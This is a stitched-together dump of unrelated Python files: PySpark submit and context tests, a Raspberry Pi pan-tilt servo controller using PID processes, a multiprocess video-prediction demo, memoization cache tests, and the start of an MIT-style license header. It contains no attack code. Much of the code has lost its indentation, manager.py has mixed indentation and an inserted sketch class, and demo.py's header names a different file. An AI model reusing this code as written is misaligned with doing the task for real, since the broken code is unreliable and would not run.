""" % (group_id, artifact_id, version)).lstrip(),
os.path.join(group_id, artifact_id, version))
self.createFileInZip("%s.py" % artifact_id, """
|def myfunc(x):
| return x + 1
""", ".jar", os.path.join(group_id, artifact_id, version),
"%s-%s" % (artifact_id, version))
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out.decode('utf-8'))
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency(self):
"""Submit and test a script with a dependency on a Spark Package"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency_on_cluster(self):
"""Submit and test a script with a dependency on a Spark Package on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, "--master",
"local-cluster[1,1,1024]", script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
self.assertTrue(SparkContext.getOrCreate() is sc)
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = list(map(gammaln, x))
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
stats_dict = s.asDict()
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_dict['sum'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['stdev'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['variance'].tolist())
stats_sample_dict = s.asDict(sample=True)
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_sample_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_sample_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_sample_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_sample_dict['sum'].tolist())
self.assertSequenceEqual(
[0.816496580927726, 0.816496580927726], stats_sample_dict['stdev'].tolist())
self.assertSequenceEqual(
[0.6666666666666666, 0.6666666666666666], stats_sample_dict['variance'].tolist())
if __name__ == "__main__":
if not _have_scipy:
print("NOTE: Skipping SciPy tests as it does not seem to be installed")
if not _have_numpy:
print("NOTE: Skipping NumPy tests as it does not seem to be installed")
unittest.main()
if not _have_scipy:
print("NOTE: SciPy tests were skipped as it does not seem to be installed")
if not _have_numpy:
print("NOTE: NumPy tests were skipped as it does not seem to be installed")
|
manager.py
|
import logging
from multiprocessing import Value, Process, Manager
import pantilthat_waveshare as pth
import signal
import sys
from rpi_deep_pantilt.detect.camera import run_pantilt_detect
from rpi_deep_pantilt.control.pid import PIDController
logging.basicConfig()
LOGLEVEL = logging.getLogger().getEffectiveLevel()
RESOLUTION = (320, 320)
SERVO_MIN = -90
SERVO_MAX = 90
CENTER = (
RESOLUTION[0] // 2,
RESOLUTION[1] // 2
)
# function to handle keyboard interrupt
def signal_handler(sig, frame):
# print a status message
print("[INFO] You pressed `ctrl + c`! Exiting...")
# disable the servos
pth.servo_enable(1, False)
pth.servo_enable(2, False)
# exit
sys.exit()
def in_range(val, start, end):
    # determine whether the input value is in the supplied range
    return start <= val <= end
def set_servos(pan, tilt):
# signal trap to handle keyboard interrupt
signal.signal(signal.SIGINT, signal_handler)
while True:
pan_angle = -1 * pan.value
tilt_angle = tilt.value
# if the pan angle is within the range, pan
if in_range(pan_angle, SERVO_MIN, SERVO_MAX):
pth.pan(pan_angle)
else:
logging.info(f'pan_angle not in range {pan_angle}')
if in_range(tilt_angle, SERVO_MIN, SERVO_MAX):
pth.tilt(tilt_angle)
else:
logging.info(f'tilt_angle not in range {tilt_angle}')
def pid_process(output, p, i, d, box_coord, origin_coord, action):
# signal trap to handle keyboard interrupt
signal.signal(signal.SIGINT, signal_handler)
# create a PID and initialize it
    pid = PIDController(p.value, i.value, d.value)
    pid.reset()
    # loop indefinitely
    while True:
        error = origin_coord - box_coord.value
        output.value = pid.update(error)
# logging.info(f'{action} error {error} angle: {output.value}')
# example label sets: ('person',) or ('orange', 'apple', 'sports ball')
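# For reference, a minimal sketch of the control law a PID controller such as the
# imported PIDController is assumed to implement (class name, defaults and the
# update(error) signature below are illustrative assumptions, not the library code):
import time
class _PIDSketch:
    """Illustrative PID: output = kP*e + kI*integral(e) + kD*de/dt."""
    def __init__(self, kP=0.05, kI=0.1, kD=0.0):
        self.kP, self.kI, self.kD = kP, kI, kD
        self.reset()
    def reset(self):
        self._prev_time = time.time()
        self._prev_error = 0.0
        self._integral = 0.0
    def update(self, error):
        now = time.time()
        dt = max(now - self._prev_time, 1e-6)
        self._integral += error * dt
        derivative = (error - self._prev_error) / dt
        self._prev_time, self._prev_error = now, error
        return self.kP * error + self.kI * self._integral + self.kD * derivative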
def pantilt_process_manager(
model_cls,
labels=('person',),
rotation=0
):
pth.servo_enable(1, True)
pth.servo_enable(2, True)
with Manager() as manager:
# set initial bounding box (x, y)-coordinates to center of frame
center_x = manager.Value('i', 0)
center_y = manager.Value('i', 0)
center_x.value = RESOLUTION[0] // 2
center_y.value = RESOLUTION[1] // 2
# pan and tilt angles updated by independent PID processes
pan = manager.Value('i', 0)
tilt = manager.Value('i', 0)
# PID gains for panning
pan_p = manager.Value('f', 0.05)
# 0 time integral gain until inferencing is faster than ~50ms
pan_i = manager.Value('f', 0.1)
pan_d = manager.Value('f', 0)
# PID gains for tilting
tilt_p = manager.Value('f', 0.15)
# 0 time integral gain until inferencing is faster than ~50ms
tilt_i = manager.Value('f', 0.2)
tilt_d = manager.Value('f', 0)
        detect_process = Process(target=run_pantilt_detect,
args=(center_x, center_y, labels, model_cls, rotation))
pan_process = Process(target=pid_process,
args=(pan, pan_p, pan_i, pan_d, center_x, CENTER[0], 'pan'))
tilt_process = Process(target=pid_process,
args=(tilt, tilt_p, tilt_i, tilt_d, center_y, CENTER[1], 'tilt'))
servo_process = Process(target=set_servos, args=(pan, tilt))
        detect_process.start()
pan_process.start()
tilt_process.start()
servo_process.start()
        detect_process.join()
pan_process.join()
tilt_process.join()
servo_process.join()
if __name__ == '__main__':
pantilt_process_manager()
|
demo.py
|
# -*- coding: utf-8 -*-
"""
@date: 2020/10/30 3:42 PM
@file: visualization.py
@author: zj
@description:
"""
import numpy as np
import torch
import torch.multiprocessing as mp
import time
from tsn.util.parser import load_test_config, parse_test_args
from demo.multiprocess.stop_token import _StopToken
from demo.multiprocess.manager.video_provider import VideoProvider
from demo.multiprocess.manager import VideoManager
from demo.multiprocess.predictor.action_predictor import ActionPredictor
from demo.multiprocess.visualizer.video_visualizor import VideoVisualizer
time_decay = 0.001
def read(cfg, task_queue):
provider = VideoProvider(cfg)
for able_to_read, task in provider:
if not able_to_read:
task_queue.put(_StopToken())
break
start = time.time()
task_queue.put(task, block=False)
print('one put task_queue need: {}'.format(time.time() - start))
provider.clean()
time.sleep(100)
def write(cfg, result_queue):
manager = VideoManager(cfg)
while True:
start = time.time()
if result_queue.empty():
time.sleep(time_decay)
continue
task = result_queue.get()
end = time.time()
print('one get result_queue need: {}'.format(end - start))
if isinstance(task, _StopToken):
break
ret = manager(task)
print('one compute manager need: {}'.format(time.time() - end))
manager.clean()
def predict(cfg, task_queue, predict_queue):
np.random.seed(cfg.RNG_SEED)
torch.manual_seed(cfg.RNG_SEED)
torch.backends.cudnn.deterministic = False
torch.backends.cudnn.benchmark = True
predictor = ActionPredictor(cfg)
while True:
start = time.time()
if task_queue.empty():
time.sleep(time_decay)
continue
task = task_queue.get()
end = time.time()
print('one get task_queue need: {}'.format(end - start))
if isinstance(task, _StopToken):
predict_queue.put(_StopToken())
break
task = predictor(task)
end1 = time.time()
print('one task predict need: {}'.format(end1 - end))
predict_queue.put(task, block=False)
print('one put predict_queue need: {}'.format(time.time() - end1))
time.sleep(100)
def visualize(cfg, predict_queue, result_queue):
visualizer = VideoVisualizer(cfg)
while True:
start = time.time()
if predict_queue.empty():
time.sleep(time_decay)
continue
task = predict_queue.get()
end = time.time()
print('one get predict_queue need: {}'.format(end - start))
if isinstance(task, _StopToken):
result_queue.put(_StopToken())
break
task = visualizer(task)
end1 = time.time()
print('one compute visualizer need: {}'.format(end1 - end))
result_queue.put(task, block=False)
print('one put result_queue need: {}'.format(time.time() - end1))
time.sleep(100)
def main():
args = parse_test_args()
cfg = load_test_config(args)
    # task queue: holds data waiting for prediction
task_queue = mp.Queue()
    # prediction queue: holds data waiting to be visualized
predict_queue = mp.Queue()
    # result queue: holds data waiting to be displayed
result_queue = mp.Queue()
process_read = mp.Process(target=read, args=(cfg, task_queue), daemon=True)
process_predict = mp.Process(target=predict, args=(cfg, task_queue, predict_queue), daemon=True)
process_visualize = mp.Process(target=visualize, args=(cfg, predict_queue, result_queue), daemon=True)
process_write = mp.Process(target=write, args=(cfg, result_queue))
process_write.start()
process_visualize.start()
process_predict.start()
time.sleep(2)
process_read.start()
process_read.join()
process_predict.join()
process_visualize.join()
process_write.join()
if __name__ == '__main__':
main()
|
test.py
|
import unittest
import random
import weakref
import gc
import time
from itertools import chain
from threading import Thread
from threading import Lock
from memoization import cached, CachingAlgorithmFlag
from memoization.caching.general.keys import make_key
exec_times = {}  # execution count of each tested function
lock = Lock() # for multi-threading tests
random.seed(100) # set seed to ensure that test results are reproducible
for i in range(1, 17):
exec_times['f' + str(i)] = 0 # init to zero
################################################################################
# Tested functions
################################################################################
@cached
def f1(x):
exec_times['f1'] += 1
return x
@cached()
def f2(x):
exec_times['f2'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=False)
def f3(x):
exec_times['f3'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=False)
def f4(x):
exec_times['f4'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=False)
def f5(x):
exec_times['f5'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=True)
def f6(x):
with lock:
exec_times['f6'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=True)
def f7(x):
with lock:
exec_times['f7'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=True)
def f8(x):
with lock:
exec_times['f8'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=False, ttl=0.5)
def f9(x):
exec_times['f9'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=False, ttl=0.5)
def f10(x):
exec_times['f10'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=False, ttl=0.5)
def f11(x):
exec_times['f11'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=False, ttl=0.5)
def f12(arg, **kwargs):
exec_times['f12'] += 1
return [arg] + [(key, value) for (key, value) in kwargs.items()]
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=False, ttl=0.5)
def f13(arg, **kwargs):
exec_times['f13'] += 1
return [arg] + [(key, value) for (key, value) in kwargs.items()]
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=False, ttl=0.5)
def f14(arg, **kwargs):
exec_times['f14'] += 1
return [arg] + [(key, value) for (key, value) in kwargs.items()]
@cached(max_size=0)
def f15(x):
exec_times['f15'] += 1
return x
@cached()
def f16(*args, **kwargs):
exec_times['f16'] += 1
return list(args) + [(key, value) for (key, value) in kwargs.items()]
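# Quick illustration of the decorator's behaviour (kept as comments so it does not
# perturb the exec_times counters asserted by the tests below; the exact repr of
# cache_info() is an assumption, only the fields used in the tests are relied on):
#   @cached(max_size=2)
#   def square(x):
#       return x * x
#   square(3); square(3)    # the second call is a cache hit
#   square.cache_info()     # hits=1, misses=1, current_size=1, max_size=2
#   square.cache_clear()    # empties the cache and resets the statistics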
################################################################################
# Test entry point
################################################################################
class TestMemoization(unittest.TestCase):
def test_memoization_with_default_arguments(self):
for _ in range(5):
f1(10)
f2(10)
f1(20)
f2(20)
self.assertEqual(exec_times['f1'], 2)
self.assertEqual(exec_times['f2'], 2)
for info in f1.cache_info(), f2.cache_info():
self.assertIsNone(info.max_size)
self.assertEqual(info.algorithm, CachingAlgorithmFlag.LRU)
self.assertIsNone(info.ttl)
self.assertTrue(info.thread_safe)
self.assertEqual(info.hits, 4)
self.assertEqual(info.misses, 2)
self.assertEqual(info.current_size, 2)
for f in f1, f2:
keys = make_key((10,), None), make_key((20,), None)
for key in keys:
self.assertIn(key, f._cache)
f1.cache_clear()
f2.cache_clear()
self._check_empty_cache_after_clearing(f1)
self._check_empty_cache_after_clearing(f2)
def test_memoization_with_FIFO(self):
self.assertTrue(hasattr(f3, '_fifo_root'))
self._fifo_test(f3)
f3.cache_clear()
self._check_empty_cache_after_clearing(f3)
def test_memoization_with_LRU(self):
self.assertTrue(hasattr(f4, '_lru_root'))
self._lru_test(f4)
f4.cache_clear()
self._check_empty_cache_after_clearing(f4)
def test_memoization_with_LFU(self):
self.assertTrue(hasattr(f5, '_lfu_root'))
self._lfu_test(f5)
self._check_lfu_cache_clearing(f5)
def test_memoization_with_FIFO_multithread(self):
self.assertTrue(hasattr(f6, '_fifo_root'))
self._general_multithreading_test(f6, CachingAlgorithmFlag.FIFO)
self._fifo_test(f6)
f6.cache_clear()
self._check_empty_cache_after_clearing(f6)
def test_memoization_with_LRU_multithread(self):
self.assertTrue(hasattr(f7, '_lru_root'))
self._general_multithreading_test(f7, CachingAlgorithmFlag.LRU)
self._lru_test(f7)
f7.cache_clear()
self._check_empty_cache_after_clearing(f7)
def test_memoization_with_LFU_multithread(self):
self.assertTrue(hasattr(f8, '_lfu_root'))
self._general_multithreading_test(f8, CachingAlgorithmFlag.LFU)
self._lfu_test(f8)
self._check_lfu_cache_clearing(f8)
def test_memoization_with_FIFO_TTL(self):
self.assertTrue(hasattr(f9, '_fifo_root'))
self._general_ttl_test(f9)
f9.cache_clear()
self._check_empty_cache_after_clearing(f9)
def test_memoization_with_LRU_TTL(self):
self.assertTrue(hasattr(f10, '_lru_root'))
self._general_ttl_test(f10)
f10.cache_clear()
self._check_empty_cache_after_clearing(f10)
def test_memoization_with_LFU_TTL(self):
self.assertTrue(hasattr(f11, '_lfu_root'))
self._general_ttl_test(f11)
self._check_lfu_cache_clearing(f11)
def test_memoization_with_FIFO_TTL_kwargs(self):
self.assertTrue(hasattr(f12, '_fifo_root'))
self._general_ttl_kwargs_test(f12)
f12.cache_clear()
self._check_empty_cache_after_clearing(f12)
def test_memoization_with_LRU_TTL_kwargs(self):
self.assertTrue(hasattr(f13, '_lru_root'))
self._general_ttl_kwargs_test(f13)
f13.cache_clear()
self._check_empty_cache_after_clearing(f13)
def test_memoization_with_LFU_TTL_kwargs(self):
self.assertTrue(hasattr(f14, '_lfu_root'))
self._general_ttl_kwargs_test(f14)
self._check_lfu_cache_clearing(f14)
def test_memoization_for_unhashable_arguments_with_FIFO(self):
self._general_unhashable_arguments_test(f3)
f3.cache_clear()
self._check_empty_cache_after_clearing(f3)
def test_memoization_for_unhashable_arguments_with_LRU(self):
self._general_unhashable_arguments_test(f4)
f4.cache_clear()
self._check_empty_cache_after_clearing(f4)
def test_memoization_for_unhashable_arguments_with_LFU(self):
self._general_unhashable_arguments_test(f5)
self._check_lfu_cache_clearing(f5)
def test_memoization_statistic_only(self):
f15(1)
f15(2)
f15(3)
self.assertEqual(exec_times['f15'], 3)
info = f15.cache_info()
self.assertEqual(info.max_size, 0)
self.assertIsNone(info.ttl)
self.assertTrue(info.thread_safe)
self.assertEqual(info.hits, 0)
self.assertEqual(info.misses, 3)
self.assertEqual(info.current_size, 0)
f15.cache_clear()
info = f15.cache_info()
self.assertEqual(info.hits, 0)
self.assertEqual(info.misses, 0)
self.assertEqual(info.current_size, 0)
    def test_memoization_for_different_order_of_kwargs(self):
f16(
1,
2,
kwarg1={"some": "dict"},
kwarg2=["it's", "a", "list"],
kwarg3="just_string",
kwarg4=4,
)
f16(
1,
2,
kwarg2=["it's", "a", "list"],
kwarg1={"some": "dict"},
kwarg4=4,
kwarg3="just_string",
)
f16(
1,
2,
kwarg3="just_string",
kwarg1={"some": "dict"},
kwarg4=4,
kwarg2=["it's", "a", "list"],
)
self.assertEqual(exec_times['f16'], 1)
info = f16.cache_info()
self.assertEqual(info.hits, 2)
self.assertEqual(info.misses, 1)
self.assertEqual(info.current_size, 1)
def _general_test(self, tested_function, algorithm, hits, misses, in_cache, not_in_cache):
# clear
exec_times[tested_function.__name__] = 0
tested_function.cache_clear()
for i in range(20):
tested_function(i)
tested_function(99)
self.assertEqual(exec_times[tested_function.__name__], 21)
info = tested_function.cache_info()
self.assertEqual(info.max_size, 5)
self.assertEqual(info.algorithm, algorithm)
self.assertIsNone(info.ttl)
self.assertIsNotNone(info.thread_safe)
self.assertEqual(info.hits, 0)
self.assertEqual(info.misses, 21)
self.assertEqual(info.current_size, 5)
keys = [make_key((x,), None) for x in (99, 19, 18, 17, 16)]
for key in keys:
self.assertIn(key, tested_function._cache)
# 10 consecutive calls here
tested_function(16)
tested_function(17)
tested_function(18)
tested_function(16)
tested_function(17)
tested_function(18)
tested_function(19)
tested_function(15)
tested_function(100)
tested_function(16)
info = tested_function.cache_info()
self.assertEqual(info.hits, hits)
self.assertEqual(info.misses, misses)
self.assertEqual(info.current_size, 5)
keys = [make_key((x,), None) for x in in_cache]
for key in keys:
self.assertIn(key, tested_function._cache)
keys = [make_key((x,), None) for x in chain(not_in_cache, range(0, 15))]
for key in keys:
self.assertNotIn(key, tested_function._cache)
def _general_multithreading_test(self, tested_function, algorithm):
number_of_keys = 30000
number_of_threads = 4
# clear
exec_times[tested_function.__name__] = 0
tested_function.cache_clear()
info = tested_function.cache_info()
self.assertEqual(info.max_size, 5)
self.assertEqual(info.algorithm, algorithm)
self.assertIsNone(info.ttl)
self.assertTrue(info.thread_safe)
self.assertEqual(info.current_size, 0)
# Test must-hit
def run_must_hit():
keys = list(range(5)) * int(number_of_keys / 5)
random.shuffle(keys)
for i in keys:
tested_function(i)
threads = [Thread(target=run_must_hit) for _ in range(number_of_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertGreaterEqual(exec_times[tested_function.__name__], 5)
info = tested_function.cache_info()
self.assertLessEqual(info.hits, number_of_keys * number_of_threads - 5)
self.assertGreaterEqual(info.misses, 5)
self.assertEqual(info.current_size, 5)
for key in [make_key((x,), None) for x in range(5)]:
self.assertIn(key, tested_function._cache)
# Test can-miss
def run_can_miss():
keys = list(range(20)) * int(number_of_keys / 20)
random.shuffle(keys)
for i in keys:
tested_function(i)
threads = [Thread(target=run_can_miss) for _ in range(number_of_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
executed_times = exec_times[tested_function.__name__]
self.assertLessEqual(executed_times, number_of_keys * number_of_threads)
self.assertGreaterEqual(executed_times, 20)
info = tested_function.cache_info()
self.assertGreaterEqual(info.hits, 0)
self.assertLessEqual(info.misses, number_of_keys * number_of_threads)
self.assertEqual(info.current_size, 5)
def _fifo_test(self, tested_function):
self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.FIFO, hits=7, misses=24,
in_cache=(16, 100, 15, 99, 19), not_in_cache=(18, 17))
self.assertEqual(exec_times[tested_function.__name__], 24)
caching_key_list = [item[0] for item in tested_function._get_caching_list()]
self.assertEqual(caching_key_list, [[16], [100], [15], [99], [19]])
def _lru_test(self, tested_function):
self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.LRU, hits=7, misses=24,
in_cache=(16, 100, 15, 19, 18), not_in_cache=(99, 17))
self.assertEqual(exec_times[tested_function.__name__], 24)
caching_key_list = [item[0] for item in tested_function._get_caching_list()]
self.assertEqual(caching_key_list, [[16], [100], [15], [19], [18]])
def _lfu_test(self, tested_function):
self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.LFU, hits=8, misses=23,
in_cache=(18, 17, 16, 19, 100), not_in_cache=(99, 15))
self.assertEqual(exec_times[tested_function.__name__], 23)
caching_key_list = [item[0] for item in tested_function._get_caching_list()]
self.assertEqual(caching_key_list, [[16], [18], [17], [19], [100]])
def _check_empty_cache_after_clearing(self, tested_function):
info = tested_function.cache_info()
self.assertEqual(info.hits, 0)
self.assertEqual(info.misses, 0)
self.assertEqual(info.current_size, 0)
cache = tested_function._cache
self.assertEqual(len(cache), 0)
def _check_lfu_cache_clearing(self, tested_function):
root_next = weakref.ref(tested_function._lfu_root.next)
first_cache_head = weakref.ref(tested_function._lfu_root.next.cache_head)
self.assertIsNotNone(root_next())
self.assertIsNotNone(first_cache_head())
tested_function.cache_clear()
self._check_empty_cache_after_clearing(tested_function)
gc.collect()
self.assertIsNone(root_next())
self.assertIsNone(first_cache_head())
def _general_ttl_test(self, tested_function, arg=1, kwargs=None):
# clear
exec_times[tested_function.__name__] = 0
tested_function.cache_clear()
def call_tested_function(arg, kwargs):
if kwargs is None:
tested_function(arg)
else:
tested_function(arg, **kwargs)
key = make_key((arg,), kwargs)
call_tested_function(arg, kwargs)
time.sleep(0.25) # wait for a short time
info = tested_function.cache_info()
self.assertEqual(info.hits, 0)
self.assertEqual(info.misses, 1)
self.assertEqual(info.current_size, 1)
self.assertIn(key, tested_function._cache)
call_tested_function(arg, kwargs) # this WILL NOT call the tested function
info = tested_function.cache_info()
self.assertEqual(info.hits, 1)
self.assertEqual(info.misses, 1)
self.assertEqual(info.current_size, 1)
self.assertIn(key, tested_function._cache)
self.assertEqual(exec_times[tested_function.__name__], 1)
time.sleep(0.35) # wait until the cache expires
info = tested_function.cache_info()
self.assertEqual(info.current_size, 1)
call_tested_function(arg, kwargs) # this WILL call the tested function
info = tested_function.cache_info()
self.assertEqual(info.hits, 1)
self.assertEqual(info.misses, 2)
self.assertEqual(info.current_size, 1)
self.assertIn(key, tested_function._cache)
self.assertEqual(exec_times[tested_function.__name__], 2)
# The previous call should have been cached, so it must not call the function again
call_tested_function(arg, kwargs) # this SHOULD NOT call the tested function
info = tested_function.cache_info()
self.assertEqual(info.hits, 2)
self.assertEqual(info.misses, 2)
self.assertEqual(info.current_size, 1)
self.assertIn(key, tested_function._cache)
self.assertEqual(exec_times[tested_function.__name__], 2)
def _general_ttl_kwargs_test(self, tested_function):
self._general_ttl_test(tested_function, arg=1, kwargs={"test": {"kwargs": [1, 0.5]}, "complex": True})
def _general_unhashable_arguments_test(self, tested_function):
args = ([1, 2, 3], {'this': 'is unhashable'}, ['yet', ['another', ['complex', {'type, ': 'isn\'t it?'}]]])
for arg in args:
# clear
exec_times[tested_function.__name__] = 0
tested_function.cache_clear()
key = make_key((arg,), None)
tested_function(arg)
self.assertIn(key, tested_function._cache)
if isinstance(arg, list):
arg.append(0)
elif isinstance(arg, dict):
arg['foo'] = 'bar'
else:
raise TypeError
key = make_key((arg,), None)
tested_function(arg)
self.assertIn(key, tested_function._cache)
if isinstance(arg, list):
arg.pop()
elif isinstance(arg, dict):
del arg['foo']
else:
raise TypeError
key = make_key((arg,), None)
tested_function(arg)
self.assertIn(key, tested_function._cache)
self.assertEqual(exec_times[tested_function.__name__], 2)
info = tested_function.cache_info()
self.assertEqual(info.hits, 1)
self.assertEqual(info.misses, 2)
self.assertEqual(info.current_size, 2)
if __name__ == '__main__':
unittest.main()
|
ircthread.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
